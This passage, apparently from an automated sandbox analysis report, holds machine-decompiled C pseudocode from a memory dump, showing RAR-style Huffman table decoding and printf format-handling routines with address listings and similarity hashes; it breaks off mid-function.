    									 *(_t201 + _t137 + 0x14) = 0;
    									_t137 = _t137 + 1;
    									__eflags = _t188;
    									if(_t188 != 0) {
    										continue;
    									}
    									break;
    								}
    								_t137 = _t137 - 1;
    								goto L15;
    							}
    							 *(_t201 + _t137 + 0x14) = 0xf;
    							L15:
    							_t137 = _t137 + 1;
    							__eflags = _t137 - 0x14;
    						} while (_t137 < 0x14);
    						_push(0x14);
    						_t189 = _t185 + 0x3c50;
    						_push(_t189);
    						_push(_t201 + 0x1c);
    						E00842CFB();
    						_t138 = 0;
    						__eflags = 0;
    						do {
    							__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84)) - 5;
    							if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84)) - 5) {
    								L19:
    								_t93 = E0083A591(_t184);
    								_t94 =  *(_t189 + 0x84);
    								_t180 = _t93 & 0x0000fffe;
    								__eflags = _t180 -  *((intOrPtr*)(_t189 + 4 + _t94 * 4));
    								if(_t180 >=  *((intOrPtr*)(_t189 + 4 + _t94 * 4))) {
    									_t148 = 0xf;
    									_t95 = _t94 + 1;
    									 *(_t201 + 0x10) = _t148;
    									__eflags = _t95 - _t148;
    									if(_t95 >= _t148) {
    										L27:
    										_t150 =  *(_t184 + 4) +  *(_t201 + 0x10);
    										 *_t184 =  *_t184 + (_t150 >> 3);
    										_t98 =  *(_t201 + 0x10);
    										 *(_t184 + 4) = _t150 & 0x00000007;
    										_t152 = 0x10;
    										_t155 =  *((intOrPtr*)(_t189 + 0x44 + _t98 * 4)) + (_t180 -  *((intOrPtr*)(_t189 + _t98 * 4)) >> _t152 - _t98);
    										__eflags = _t155 -  *_t189;
    										asm("sbb eax, eax");
    										_t99 = _t98 & _t155;
    										__eflags = _t99;
    										_t156 =  *(_t189 + 0xc88 + _t99 * 2) & 0x0000ffff;
    										L28:
    										__eflags = _t156 - 0x10;
    										if(_t156 >= 0x10) {
    											__eflags = _t156 - 0x12;
    											if(__eflags >= 0) {
    												_t157 = _t184;
    												if(__eflags != 0) {
    													_t192 = (E0083A58C(_t157) >> 9) + 0xb;
    													__eflags = _t192;
    													_push(7);
    												} else {
    													_t192 = (E0083A58C(_t157) >> 0xd) + 3;
    													_push(3);
    												}
    												E0083A575(_t184);
    												while(1) {
    													_t192 = _t192 - 1;
    													__eflags = _t138 - 0x194;
    													if(_t138 >= 0x194) {
    														goto L46;
    													}
    													 *(_t201 + _t138 + 0x28) = 0;
    													_t138 = _t138 + 1;
    													__eflags = _t192;
    													if(_t192 != 0) {
    														continue;
    													}
    													L44:
    													_t189 = _t185 + 0x3c50;
    													goto L45;
    												}
    												break;
    											}
    											__eflags = _t156 - 0x10;
    											_t166 = _t184;
    											if(_t156 != 0x10) {
    												_t198 = (E0083A58C(_t166) >> 9) + 0xb;
    												__eflags = _t198;
    												_push(7);
    											} else {
    												_t198 = (E0083A58C(_t166) >> 0xd) + 3;
    												_push(3);
    											}
    											E0083A575(_t184);
    											__eflags = _t138;
    											if(_t138 == 0) {
    												L47:
    												_t116 = 0;
    												L49:
    												return _t116;
    											} else {
    												while(1) {
    													_t198 = _t198 - 1;
    													__eflags = _t138 - 0x194;
    													if(_t138 >= 0x194) {
    														goto L46;
    													}
    													 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t201 + _t138 + 0x27));
    													_t138 = _t138 + 1;
    													__eflags = _t198;
    													if(_t198 != 0) {
    														continue;
    													}
    													goto L44;
    												}
    												break;
    											}
    										}
    										 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t138 + _t185 + 0xe4c8)) + _t156 & 0x0000000f;
    										_t138 = _t138 + 1;
    										goto L45;
    									}
    									_t169 = 4 + _t95 * 4 + _t189;
    									__eflags = _t169;
    									while(1) {
    										__eflags = _t180 -  *_t169;
    										if(_t180 <  *_t169) {
    											break;
    										}
    										_t95 = _t95 + 1;
    										_t169 = _t169 + 4;
    										__eflags = _t95 - 0xf;
    										if(_t95 < 0xf) {
    											continue;
    										}
    										goto L27;
    									}
    									 *(_t201 + 0x10) = _t95;
    									goto L27;
    								}
    								_t170 = 0x10;
    								_t183 = _t180 >> _t170 - _t94;
    								_t173 = ( *(_t183 + _t189 + 0x88) & 0x000000ff) +  *(_t184 + 4);
    								 *_t184 =  *_t184 + (_t173 >> 3);
    								 *(_t184 + 4) = _t173 & 0x00000007;
    								_t156 =  *(_t189 + 0x488 + _t183 * 2) & 0x0000ffff;
    								goto L28;
    							}
    							_t127 = E00844406(_t185);
    							__eflags = _t127;
    							if(_t127 == 0) {
    								goto L47;
    							}
    							goto L19;
    							L45:
    							__eflags = _t138 - 0x194;
    						} while (_t138 < 0x194);
    						L46:
    						 *((char*)(_t185 + 0xe661)) = 1;
    						__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84));
    						if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84))) {
    							_push(0x12b);
    							_push(_t185 + 0xa0);
    							_push(_t201 + 0x30);
    							E00842CFB();
    							_push(0x3c);
    							_push(_t185 + 0xf8c);
    							_push(_t201 + 0x15b);
    							E00842CFB();
    							_push(0x11);
    							_push(_t185 + 0x1e78);
    							_push(_t201 + 0x197);
    							E00842CFB();
    							_push(0x1c);
    							_push(_t185 + 0x2d64);
    							_push(_t201 + 0x1a8);
    							E00842CFB();
    							E0084EA80(_t185 + 0xe4c8, _t201 + 0x2c, 0x194);
    							_t116 = 1;
    							goto L49;
    						}
    						goto L47;
    					}
    					 *((intOrPtr*)(_t185 + 0xe65c)) = 1;
    					_push(_t185 + 0xe4c4);
    					_push(_t185);
    					return E008424A8(_t185 + 0x98d8, _t178, _t205);
    				}
    				_t135 = E00844406(__ecx);
    				if(_t135 != 0) {
    					goto L2;
    				}
    				return _t135;
    			}





































    0x008436c1
    0x008436c8
    0x008436d1
    0x008436d9
    0x008436e8
    0x008436f3
    0x008436fa
    0x008436ff
    0x00843704
    0x00843729
    0x0084372b
    0x00843731
    0x00843737
    0x0084373d
    0x00843742
    0x00843751
    0x00843756
    0x00843756
    0x0084375d
    0x00843763
    0x00843774
    0x00843778
    0x0084377d
    0x00843781
    0x00843784
    0x008437bd
    0x00000000
    0x008437bd
    0x00843794
    0x00843797
    0x0084379c
    0x0084379e
    0x008437a7
    0x008437a7
    0x008437aa
    0x008437aa
    0x008437ab
    0x008437ae
    0x00000000
    0x00000000
    0x008437b0
    0x008437b5
    0x008437b6
    0x008437b8
    0x00000000
    0x00000000
    0x00000000
    0x008437b8
    0x008437ba
    0x00000000
    0x008437ba
    0x008437a0
    0x008437c1
    0x008437c1
    0x008437c2
    0x008437c2
    0x008437c7
    0x008437c9
    0x008437d1
    0x008437d6
    0x008437d7
    0x008437dc
    0x008437dc
    0x008437de
    0x008437e7
    0x008437e9
    0x008437fa
    0x008437fc
    0x00843803
    0x00843809
    0x0084380f
    0x00843813
    0x00843840
    0x00843841
    0x00843842
    0x00843846
    0x00843848
    0x00843866
    0x00843869
    0x00843875
    0x00843877
    0x0084387b
    0x00843880
    0x0084388d
    0x0084388f
    0x00843892
    0x00843894
    0x00843894
    0x00843896
    0x0084389e
    0x0084389e
    0x008438a1
    0x008438b8
    0x008438bb
    0x00843907
    0x00843909
    0x00843926
    0x00843926
    0x00843929
    0x0084390b
    0x00843915
    0x00843918
    0x00843918
    0x0084392d
    0x00843932
    0x00843932
    0x00843933
    0x00843939
    0x00000000
    0x00000000
    0x0084393b
    0x00843940
    0x00843941
    0x00843943
    0x00000000
    0x00000000
    0x00843945
    0x00843945
    0x00000000
    0x00843945
    0x00000000
    0x00843932
    0x008438bd
    0x008438c0
    0x008438c2
    0x008438df
    0x008438df
    0x008438e2
    0x008438c4
    0x008438ce
    0x008438d1
    0x008438d1
    0x008438e6
    0x008438eb
    0x008438ed
    0x00843968
    0x00843968
    0x008439e7
    0x00000000
    0x008438ef
    0x008438ef
    0x008438ef
    0x008438f0
    0x008438f6
    0x00000000
    0x00000000
    0x008438fc
    0x00843900
    0x00843901
    0x00843903
    0x00000000
    0x00000000
    0x00000000
    0x00843905
    0x00000000
    0x008438ef
    0x008438ed
    0x008438ae
    0x008438b2
    0x00000000
    0x008438b2
    0x00843851
    0x00843851
    0x00843853
    0x00843853
    0x00843855
    0x00000000
    0x00000000
    0x00843857
    0x00843858
    0x0084385b
    0x0084385e
    0x00000000
    0x00000000
    0x00000000
    0x00843860
    0x00843862
    0x00000000
    0x00843862
    0x00843817
    0x0084381a
    0x00843824
    0x0084382c
    0x00843831
    0x00843834
    0x00000000
    0x00843834
    0x008437ed
    0x008437f2
    0x008437f4
    0x00000000
    0x00000000
    0x00000000
    0x0084394b
    0x0084394b
    0x0084394b
    0x00843957
    0x00843959
    0x00843960
    0x00843966
    0x0084396c
    0x00843979
    0x0084397e
    0x0084397f
    0x00843984
    0x0084398e
    0x00843996
    0x00843997
    0x0084399c
    0x008439a6
    0x008439ae
    0x008439af
    0x008439b4
    0x008439be
    0x008439c6
    0x008439c7
    0x008439dd
    0x008439e5
    0x00000000
    0x008439e5
    0x00000000
    0x00843966
    0x0084370c
    0x00843716
    0x00843717
    0x00000000
    0x0084371e
    0x008436db
    0x008436e2
    0x00000000
    0x00000000
    0x008439f1

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1a617c1ada0a93cd2e5fc4104e071ca5ab75f100ba31abb5d19aafa8a1e8b291
    • Instruction ID: 85073b23fb2949f7e93a40a5c1c5c931b5e217981289d42967471b8117fa35bd
    • Opcode Fuzzy Hash: 1a617c1ada0a93cd2e5fc4104e071ca5ab75f100ba31abb5d19aafa8a1e8b291
    • Instruction Fuzzy Hash: 9F9125B020434D9BDB28EF68D891BBEBBD5FB90304F10092DE5D6C7282DB749644C792
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00853F49(void* __ebx, void* __ecx, void* __edi, void* __esi) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _t52;
    				signed int _t54;
    				signed int _t55;
    				void* _t56;
    				signed char _t60;
    				signed char _t62;
    				signed int _t64;
    				void* _t65;
    				signed int _t66;
    				signed char _t75;
    				signed char _t78;
    				void* _t86;
    				void* _t88;
    				signed char _t90;
    				signed char _t92;
    				signed int _t93;
    				signed int _t96;
    				signed int _t98;
    				signed int _t99;
    				signed int _t103;
    				signed int* _t104;
    				void* _t106;
    				signed int _t112;
    				unsigned int _t114;
    				signed char _t116;
    				void* _t124;
    				unsigned int _t125;
    				void* _t126;
    				signed int _t127;
    				short _t128;
    				void* _t131;
    				void* _t133;
    				void* _t135;
    				signed int _t136;
    				void* _t137;
    				void* _t139;
    				void* _t140;
    
    				_t126 = __edi;
    				_t52 =  *0x86d668; // 0x14325215
    				_v8 = _t52 ^ _t136;
    				_t135 = __ecx;
    				_t103 = 0;
    				_t124 = 0x41;
    				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
    				_t106 = 0x58;
    				_t139 = _t54 - 0x64;
    				if(_t139 > 0) {
    					__eflags = _t54 - 0x70;
    					if(__eflags > 0) {
    						_t55 = _t54 - 0x73;
    						__eflags = _t55;
    						if(_t55 == 0) {
    							L9:
    							_t56 = E0085497B(_t135);
    							L10:
    							if(_t56 != 0) {
    								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
    								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
    									L71:
    									L72:
    									return E0084E243(_v8 ^ _t136);
    								}
    								_t125 =  *(_t135 + 0x20);
    								_push(_t126);
    								_v16 = _t103;
    								_t60 = _t125 >> 4;
    								_v12 = _t103;
    								_t127 = 0x20;
    								__eflags = 1 & _t60;
    								if((1 & _t60) == 0) {
    									L46:
    									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
    									__eflags = _t112 - 0x78;
    									if(_t112 == 0x78) {
    										L48:
    										_t62 = _t125 >> 5;
    										__eflags = _t62 & 0x00000001;
    										if((_t62 & 0x00000001) == 0) {
    											L50:
    											__eflags = 0;
    											L51:
    											__eflags = _t112 - 0x61;
    											if(_t112 == 0x61) {
    												L54:
    												_t64 = 1;
    												L55:
    												_t128 = 0x30;
    												__eflags = _t64;
    												if(_t64 != 0) {
    													L57:
    													_t65 = 0x58;
    													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
    													__eflags = _t112 - _t65;
    													if(_t112 == _t65) {
    														L60:
    														_t66 = 1;
    														L61:
    														__eflags = _t66;
    														asm("cbw");
    														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
    														_t103 = _t103 + 2;
    														__eflags = _t103;
    														L62:
    														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
    														__eflags = _t125 & 0x0000000c;
    														if((_t125 & 0x0000000c) == 0) {
    															E00853210(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
    															_t137 = _t137 + 0x10;
    														}
    														E00854C7B(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
    														_t114 =  *(_t135 + 0x20);
    														_t104 = _t135 + 0x18;
    														_t75 = _t114 >> 3;
    														__eflags = _t75 & 0x00000001;
    														if((_t75 & 0x00000001) != 0) {
    															_t116 = _t114 >> 2;
    															__eflags = _t116 & 0x00000001;
    															if((_t116 & 0x00000001) == 0) {
    																E00853210(_t135 + 0x448, 0x30, _t131, _t104);
    																_t137 = _t137 + 0x10;
    															}
    														}
    														E00854B5D(_t135, 0);
    														__eflags =  *_t104;
    														if( *_t104 >= 0) {
    															_t78 =  *(_t135 + 0x20) >> 2;
    															__eflags = _t78 & 0x00000001;
    															if((_t78 & 0x00000001) != 0) {
    																E00853210(_t135 + 0x448, 0x20, _t131, _t104);
    															}
    														}
    														goto L71;
    													}
    													_t86 = 0x41;
    													__eflags = _t112 - _t86;
    													if(_t112 == _t86) {
    														goto L60;
    													}
    													_t66 = 0;
    													goto L61;
    												}
    												__eflags = _t64;
    												if(_t64 == 0) {
    													goto L62;
    												}
    												goto L57;
    											}
    											_t133 = 0x41;
    											__eflags = _t112 - _t133;
    											if(_t112 == _t133) {
    												goto L54;
    											}
    											_t64 = 0;
    											goto L55;
    										}
    										goto L51;
    									}
    									_t88 = 0x58;
    									__eflags = _t112 - _t88;
    									if(_t112 != _t88) {
    										goto L50;
    									}
    									goto L48;
    								}
    								_t90 = _t125 >> 6;
    								__eflags = 1 & _t90;
    								if((1 & _t90) == 0) {
    									__eflags = 1 & _t125;
    									if((1 & _t125) == 0) {
    										_t92 = _t125 >> 1;
    										__eflags = 1 & _t92;
    										if((1 & _t92) == 0) {
    											goto L46;
    										}
    										_v16 = _t127;
    										L45:
    										_t103 = 1;
    										goto L46;
    									}
    									_push(0x2b);
    									L40:
    									_pop(_t93);
    									_v16 = _t93;
    									goto L45;
    								}
    								_push(0x2d);
    								goto L40;
    							}
    							L11:
    							goto L72;
    						}
    						_t96 = _t55;
    						__eflags = _t96;
    						if(__eflags == 0) {
    							L28:
    							_push(_t103);
    							_push(0xa);
    							L29:
    							_t56 = E00854713(_t135, _t126, __eflags);
    							goto L10;
    						}
    						__eflags = _t96 - 3;
    						if(__eflags != 0) {
    							goto L11;
    						}
    						_push(0);
    						L13:
    						_push(0x10);
    						goto L29;
    					}
    					if(__eflags == 0) {
    						_t56 = E008548F0(__ecx);
    						goto L10;
    					}
    					__eflags = _t54 - 0x67;
    					if(_t54 <= 0x67) {
    						L30:
    						_t56 = E00854479(_t103, _t135);
    						goto L10;
    					}
    					__eflags = _t54 - 0x69;
    					if(_t54 == 0x69) {
    						L27:
    						_t3 = _t135 + 0x20;
    						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
    						__eflags =  *_t3;
    						goto L28;
    					}
    					__eflags = _t54 - 0x6e;
    					if(_t54 == 0x6e) {
    						_t56 = E0085485D(__ecx, _t124);
    						goto L10;
    					}
    					__eflags = _t54 - 0x6f;
    					if(_t54 != 0x6f) {
    						goto L11;
    					}
    					_t56 = E008548D1(__ecx);
    					goto L10;
    				}
    				if(_t139 == 0) {
    					goto L27;
    				}
    				_t140 = _t54 - _t106;
    				if(_t140 > 0) {
    					_t98 = _t54 - 0x5a;
    					__eflags = _t98;
    					if(_t98 == 0) {
    						_t56 = E008542BC(__ecx);
    						goto L10;
    					}
    					_t99 = _t98 - 7;
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L30;
    					}
    					__eflags = _t99;
    					if(__eflags != 0) {
    						goto L11;
    					}
    					L17:
    					_t56 = E0085467B(_t135, __eflags, _t103);
    					goto L10;
    				}
    				if(_t140 == 0) {
    					_push(1);
    					goto L13;
    				}
    				if(_t54 == _t124) {
    					goto L30;
    				}
    				if(_t54 == 0x43) {
    					goto L17;
    				}
    				if(_t54 <= 0x44) {
    					goto L11;
    				}
    				if(_t54 <= 0x47) {
    					goto L30;
    				}
    				if(_t54 != 0x53) {
    					goto L11;
    				}
    				goto L9;
    			}











































    0x00853f49
    0x00853f51
    0x00853f58
    0x00853f5d
    0x00853f5f
    0x00853f63
    0x00853f66
    0x00853f6a
    0x00853f6b
    0x00853f6e
    0x00853fdb
    0x00853fde
    0x0085402d
    0x0085402d
    0x00854030
    0x00853f9c
    0x00853f9e
    0x00853fa3
    0x00853fa5
    0x0085404b
    0x0085404e
    0x00854194
    0x00854196
    0x008541a5
    0x008541a5
    0x00854054
    0x00854059
    0x0085405c
    0x0085405f
    0x00854063
    0x00854069
    0x0085406a
    0x0085406c
    0x00854096
    0x00854096
    0x0085409a
    0x0085409d
    0x008540a7
    0x008540a9
    0x008540ac
    0x008540ae
    0x008540b4
    0x008540b4
    0x008540b6
    0x008540b6
    0x008540b9
    0x008540c7
    0x008540c7
    0x008540c9
    0x008540cb
    0x008540cc
    0x008540ce
    0x008540d4
    0x008540d6
    0x008540d7
    0x008540dc
    0x008540df
    0x008540ed
    0x008540ed
    0x008540ef
    0x008540ef
    0x008540fa
    0x008540fc
    0x00854101
    0x00854101
    0x00854104
    0x0085410a
    0x0085410c
    0x0085410f
    0x0085411f
    0x00854124
    0x00854124
    0x00854139
    0x0085413e
    0x00854141
    0x00854146
    0x00854149
    0x0085414b
    0x0085414d
    0x00854150
    0x00854153
    0x00854160
    0x00854165
    0x00854165
    0x00854153
    0x0085416c
    0x00854171
    0x00854174
    0x00854179
    0x0085417c
    0x0085417e
    0x0085418b
    0x00854190
    0x0085417e
    0x00000000
    0x00854193
    0x008540e3
    0x008540e4
    0x008540e7
    0x00000000
    0x00000000
    0x008540e9
    0x00000000
    0x008540e9
    0x008540d0
    0x008540d2
    0x00000000
    0x00000000
    0x00000000
    0x008540d2
    0x008540bd
    0x008540be
    0x008540c1
    0x00000000
    0x00000000
    0x008540c3
    0x00000000
    0x008540c3
    0x00000000
    0x008540b0
    0x008540a1
    0x008540a2
    0x008540a5
    0x00000000
    0x00000000
    0x00000000
    0x008540a5
    0x00854070
    0x00854073
    0x00854075
    0x00854080
    0x00854082
    0x0085408a
    0x0085408c
    0x0085408e
    0x00000000
    0x00000000
    0x00854090
    0x00854094
    0x00854094
    0x00000000
    0x00854094
    0x00854084
    0x00854079
    0x00854079
    0x0085407a
    0x00000000
    0x0085407a
    0x00854077
    0x00000000
    0x00854077
    0x00853fab
    0x00000000
    0x00853fab
    0x00854037
    0x00854037
    0x0085403a
    0x0085400c
    0x0085400c
    0x0085400d
    0x0085400f
    0x00854011
    0x00000000
    0x00854011
    0x0085403c
    0x0085403f
    0x00000000
    0x00000000
    0x00854045
    0x00853fb4
    0x00853fb4
    0x00000000
    0x00853fb4
    0x00853fe0
    0x00854023
    0x00000000
    0x00854023
    0x00853fe2
    0x00853fe5
    0x00854018
    0x0085401a
    0x00000000
    0x0085401a
    0x00853fe7
    0x00853fea
    0x00854008
    0x00854008
    0x00854008
    0x00854008
    0x00000000
    0x00854008
    0x00853fec
    0x00853fef
    0x00854001
    0x00000000
    0x00854001
    0x00853ff1
    0x00853ff4
    0x00000000
    0x00000000
    0x00853ff8
    0x00000000
    0x00853ff8
    0x00853f70
    0x00000000
    0x00000000
    0x00853f76
    0x00853f78
    0x00853fb8
    0x00853fb8
    0x00853fbb
    0x00853fd4
    0x00000000
    0x00853fd4
    0x00853fbd
    0x00853fbd
    0x00853fc0
    0x00000000
    0x00000000
    0x00853fc3
    0x00853fc6
    0x00000000
    0x00000000
    0x00853fc8
    0x00853fcb
    0x00000000
    0x00853fcb
    0x00853f7a
    0x00853fb2
    0x00000000
    0x00853fb2
    0x00853f7e
    0x00000000
    0x00000000
    0x00853f87
    0x00000000
    0x00000000
    0x00853f8c
    0x00000000
    0x00000000
    0x00853f91
    0x00000000
    0x00000000
    0x00853f9a
    0x00000000
    0x00000000
    0x00000000

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4cb0c086e41a91d6de8d1d9839660cc089eba394d1f0281c91b467c60df0ab9a
    • Instruction ID: c1263024db621817cb54d7d8097e666f93ddd069f198885c708bc5b64d73347f
    • Opcode Fuzzy Hash: 4cb0c086e41a91d6de8d1d9839660cc089eba394d1f0281c91b467c60df0ab9a
    • Instruction Fuzzy Hash: 35617A71A40F0866DF74996888557BE73A4FB4138FF20291AEE43CB2C1DA51DECE8356
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E008439F2(void* __ecx) {
    				signed int _t71;
    				signed int _t72;
    				signed int _t73;
    				signed int _t76;
    				signed int _t77;
    				signed int _t78;
    				signed int _t90;
    				signed int _t94;
    				signed int _t109;
    				intOrPtr* _t111;
    				signed int _t114;
    				intOrPtr _t115;
    				signed int _t121;
    				signed int _t124;
    				signed int _t125;
    				signed int _t131;
    				signed int _t133;
    				void* _t135;
    				signed int _t138;
    				intOrPtr* _t139;
    				intOrPtr* _t150;
    				void* _t151;
    				signed int _t154;
    				unsigned int _t159;
    				signed int _t162;
    				signed int _t164;
    				signed int _t165;
    				intOrPtr* _t168;
    				void* _t170;
    				void* _t171;
    
    				_t170 = __ecx;
    				if( *((char*)( *((intOrPtr*)(_t171 + 8)) + 0x11)) != 0) {
    					_t168 =  *((intOrPtr*)(_t171 + 0x1d8));
    					__eflags =  *((char*)(_t168 + 8));
    					if( *((char*)(_t168 + 8)) != 0) {
    						L5:
    						_t164 = 0;
    						__eflags = 0;
    						do {
    							_t109 = E0083A58C(_t168) >> 0x0000000c & 0x000000ff;
    							E0083A575(_t168, 4);
    							__eflags = _t109 - 0xf;
    							if(_t109 != 0xf) {
    								 *(_t171 + _t164 + 0x18) = _t109;
    								goto L14;
    							}
    							_t124 = E0083A58C(_t168) >> 0x0000000c & 0x000000ff;
    							E0083A575(_t168, 4);
    							__eflags = _t124;
    							if(_t124 != 0) {
    								_t125 = _t124 + 2;
    								__eflags = _t125;
    								while(1) {
    									_t125 = _t125 - 1;
    									__eflags = _t164 - 0x14;
    									if(_t164 >= 0x14) {
    										break;
    									}
    									 *(_t171 + _t164 + 0x18) = 0;
    									_t164 = _t164 + 1;
    									__eflags = _t125;
    									if(_t125 != 0) {
    										continue;
    									}
    									break;
    								}
    								_t164 = _t164 - 1;
    								goto L14;
    							}
    							 *(_t171 + _t164 + 0x18) = 0xf;
    							L14:
    							_t164 = _t164 + 1;
    							__eflags = _t164 - 0x14;
    						} while (_t164 < 0x14);
    						_push(0x14);
    						_t111 =  *((intOrPtr*)(_t171 + 0x1e8)) + 0x3bb0;
    						_push(_t111);
    						_push(_t171 + 0x18);
    						 *((intOrPtr*)(_t171 + 0x20)) = _t111;
    						E00842CFB();
    						_t165 = 0;
    						__eflags = 0;
    						do {
    							__eflags =  *((char*)(_t168 + 8));
    							if( *((char*)(_t168 + 8)) != 0) {
    								L19:
    								_t71 = E0083A591(_t168);
    								_t72 =  *(_t111 + 0x84);
    								_t159 = _t71 & 0x0000fffe;
    								__eflags = _t159 -  *((intOrPtr*)(_t111 + 4 + _t72 * 4));
    								if(_t159 >=  *((intOrPtr*)(_t111 + 4 + _t72 * 4))) {
    									_t131 = 0xf;
    									_t73 = _t72 + 1;
    									 *(_t171 + 0x10) = _t131;
    									__eflags = _t73 - _t131;
    									if(_t73 >= _t131) {
    										L27:
    										_t133 =  *(_t168 + 4) +  *(_t171 + 0x10);
    										 *_t168 =  *_t168 + (_t133 >> 3);
    										_t76 =  *(_t171 + 0x10);
    										 *(_t168 + 4) = _t133 & 0x00000007;
    										_t135 = 0x10;
    										_t138 =  *((intOrPtr*)(_t111 + 0x44 + _t76 * 4)) + (_t159 -  *((intOrPtr*)(_t111 + _t76 * 4)) >> _t135 - _t76);
    										__eflags = _t138 -  *_t111;
    										asm("sbb eax, eax");
    										_t77 = _t76 & _t138;
    										__eflags = _t77;
    										_t78 =  *(_t111 + 0xc88 + _t77 * 2) & 0x0000ffff;
    										L28:
    										__eflags = _t78 - 0x10;
    										if(_t78 >= 0x10) {
    											_t139 = _t168;
    											__eflags = _t78 - 0x12;
    											if(__eflags >= 0) {
    												if(__eflags != 0) {
    													_t114 = (E0083A58C(_t139) >> 9) + 0xb;
    													__eflags = _t114;
    													_push(7);
    												} else {
    													_t114 = (E0083A58C(_t139) >> 0xd) + 3;
    													_push(3);
    												}
    												E0083A575(_t168);
    												while(1) {
    													_t114 = _t114 - 1;
    													__eflags = _t165 - 0x1ae;
    													if(_t165 >= 0x1ae) {
    														goto L46;
    													}
    													 *(_t171 + _t165 + 0x2c) = 0;
    													_t165 = _t165 + 1;
    													__eflags = _t114;
    													if(_t114 != 0) {
    														continue;
    													}
    													L44:
    													_t111 =  *((intOrPtr*)(_t171 + 0x14));
    													goto L45;
    												}
    												break;
    											}
    											__eflags = _t78 - 0x10;
    											if(_t78 != 0x10) {
    												_t121 = (E0083A58C(_t139) >> 9) + 0xb;
    												__eflags = _t121;
    												_push(7);
    											} else {
    												_t121 = (E0083A58C(_t139) >> 0xd) + 3;
    												_push(3);
    											}
    											E0083A575(_t168);
    											__eflags = _t165;
    											if(_t165 == 0) {
    												L48:
    												_t90 = 0;
    												L50:
    												L51:
    												return _t90;
    											} else {
    												while(1) {
    													_t121 = _t121 - 1;
    													__eflags = _t165 - 0x1ae;
    													if(_t165 >= 0x1ae) {
    														goto L46;
    													}
    													 *(_t171 + _t165 + 0x2c) =  *((intOrPtr*)(_t171 + _t165 + 0x2b));
    													_t165 = _t165 + 1;
    													__eflags = _t121;
    													if(_t121 != 0) {
    														continue;
    													}
    													goto L44;
    												}
    												break;
    											}
    										}
    										 *(_t171 + _t165 + 0x2c) = _t78;
    										_t165 = _t165 + 1;
    										goto L45;
    									}
    									_t150 = _t111 + (_t73 + 1) * 4;
    									while(1) {
    										__eflags = _t159 -  *_t150;
    										if(_t159 <  *_t150) {
    											break;
    										}
    										_t73 = _t73 + 1;
    										_t150 = _t150 + 4;
    										__eflags = _t73 - 0xf;
    										if(_t73 < 0xf) {
    											continue;
    										}
    										goto L27;
    									}
    									 *(_t171 + 0x10) = _t73;
    									goto L27;
    								}
    								_t151 = 0x10;
    								_t162 = _t159 >> _t151 - _t72;
    								_t154 = ( *(_t162 + _t111 + 0x88) & 0x000000ff) +  *(_t168 + 4);
    								 *_t168 =  *_t168 + (_t154 >> 3);
    								 *(_t168 + 4) = _t154 & 0x00000007;
    								_t78 =  *(_t111 + 0x488 + _t162 * 2) & 0x0000ffff;
    								goto L28;
    							}
    							__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84)) - 5;
    							if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84)) - 5) {
    								goto L19;
    							}
    							_t94 = E00844495(_t170);
    							__eflags = _t94;
    							if(_t94 == 0) {
    								goto L48;
    							}
    							goto L19;
    							L45:
    							__eflags = _t165 - 0x1ae;
    						} while (_t165 < 0x1ae);
    						L46:
    						 *((char*)(_t170 + 0xe662)) = 1;
    						__eflags =  *((char*)(_t168 + 8));
    						if( *((char*)(_t168 + 8)) != 0) {
    							L49:
    							_t115 =  *((intOrPtr*)(_t171 + 0x1e8));
    							_push(0x132);
    							_push(_t115);
    							_push(_t171 + 0x2c);
    							E00842CFB();
    							_push(0x40);
    							_push(_t115 + 0xeec);
    							_push(_t171 + 0x166);
    							E00842CFB();
    							_push(0x10);
    							_push(_t115 + 0x1dd8);
    							_push(_t171 + 0x1a6);
    							E00842CFB();
    							_push(0x2c);
    							_push(_t115 + 0x2cc4);
    							_push(_t171 + 0x1b6);
    							E00842CFB();
    							_t90 = 1;
    							goto L50;
    						}
